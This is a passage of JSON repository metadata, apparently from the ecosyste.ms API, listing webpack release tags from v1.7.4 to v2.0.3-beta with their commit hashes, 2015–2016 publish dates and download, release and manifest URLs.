/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"df4e2e4e3df27d682feb962b896595d7eab27c2a","kind":"tag","published_at":"2015-06-27T20:50:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.0/manifests"},{"name":"v1.9.13","sha":"e925c52a0e9fa55b06ffcc3b575e7f1621714056","kind":"tag","published_at":"2015-06-27T09:38:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.13/manifests"},{"name":"v1.9.12","sha":"ba03fda4b5d2a515ccd87d26f3edd0dd357c4fde","kind":"tag","published_at":"2015-06-24T21:24:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.12/manifests"},{"name":"v1.9.11","sha":"4c0f4afe8710376726a85c756729dc5e0b86fb95","kind":"tag","published_at":"2015-06-14T10:05:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.11/manifests"},{"name":"v1.9.10","sha":"4de7bed0f946e42e6dde546ba35233e4eeb87c9d","kind":"tag","published_at":"2015-05-25T19:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.10/manifests"},{"name":"v1.9.9","sha":"407d1bc76b41717a47f87211ffd6cbdfff6c7b1e","kind":"tag","published_at":"2015-05-24T07:35:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.9/manifests"},{"name":"v1.9.8","sha":"69df24cc562c10caf5c02f36459ecacb7cd1823d","kind":"tag","published_at":"2015-05-21T22:16:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.8/manifests"},{"name":"v1.9.7","sha":"0990aaa4754969e34184657577389b88fd845e87","kind":"tag","published_at":"2015-05-17T17:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.7/manifests"},{"name":"v1.9.6","sha":"c5eceb0b2cf31fca84e724d3893d44c7042b9038","kind":"tag","published_at":"2015-05-15T15:24:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.6/manifests"},{"name":"v1.9.5","sha":"e37a50683f74d6996373186db757289256a41bf7","kind":"tag","published_at":"2015-05-12T19:21:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.5/manifests"},{"name":"v1.9.4","sha":"ac84ef731540635f615438cc8f4424ff63003ce1","kind":"tag","published_at":"2015-05-10T16:45:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.4/manifests"},{"name":"v1.9.3","sha":"c7ac77fc907950dcf0dc355fae86164f688f9857","kind":"tag","published_at":"2015-05-10T14:44:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.3/manifests"},{"name":"v1.9.2","sha":"0576143e96be118e4621f79db4b8d03b6d2c808e","kind":"tag","published_at":"2015-05-10T12:37:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"98663e71dbacfb82e02379671a821a373150dc7c","kind":"tag","published_at":"2015-05-10T11:53:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"0e21e6ec0b2e4ebc085c9e6ccf823480384e3943","kind":"tag","published_at":"2015-05-10T10:23:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.9.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.9.0/manifests"},{"name":"v1.8.11","sha":"f7d7d30ee647dd8fc77972752d5b9fc47bbe09ea","kind":"tag","published_at":"2015-04-29T10:49:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.11/manifests"},{"name":"v1.8.10","sha":"8e490bdee33dd4edea82c6d13ba80c6fe3246218","kind":"tag","published_at":"2015-04-26T20:50:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.10/manifests"},{"name":"v1.8.9","sha":"e4453c78edb4613804c0c0a0e9f447d2def533c3","kind":"tag","published_at":"2015-04-21T21:34:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.9/manifests"},{"name":"v1.8.8","sha":"924e02c98aba21b65d913a1f0e16d8818f018c3b","kind":"tag","published_at":"2015-04-21T06:38:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.8/manifests"},{"name":"v1.8.7","sha":"0bc887a06c7f34a95e2756097f193f15ec1a443d","kind":"tag","published_at":"2015-04-20T18:51:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.7/manifests"},{"name":"v1.8.6","sha":"a27641f8cc68ec557d9ca524afbbfb3b34ec2408","kind":"tag","published_at":"2015-04-20T17:46:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.6/manifests"},{"name":"v1.8.5","sha":"53a534663446bfaa8fc4b3c202542d6a8a2aaadc","kind":"tag","published_at":"2015-04-17T08:26:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.5/manifests"},{"name":"v1.8.4","sha":"bffe6037e99c7a741d64414368295b026d81c81a","kind":"tag","published_at":"2015-04-10T08:23:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.4/manifests"},{"name":"v1.8.3","sha":"13c3a3c3445ac9b76f3fe2602963e8748673b458","kind":"tag","published_at":"2015-04-09T22:19:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.8.3/manifests"},{"name":"v1.7.4","sha":"43a12294470d9e0337a325095e0fd4a3669ed6c6","kind":"tag","published_at":"2015-04-09T22:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.7.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.7.4/manifests"},{"name":"v1.8.2","sha":"4c2b7a9ea5b45481ad408c8275ef58e6140a038f","kind":"tag","published_at":"2015-04-08T13:12:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.8.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.8.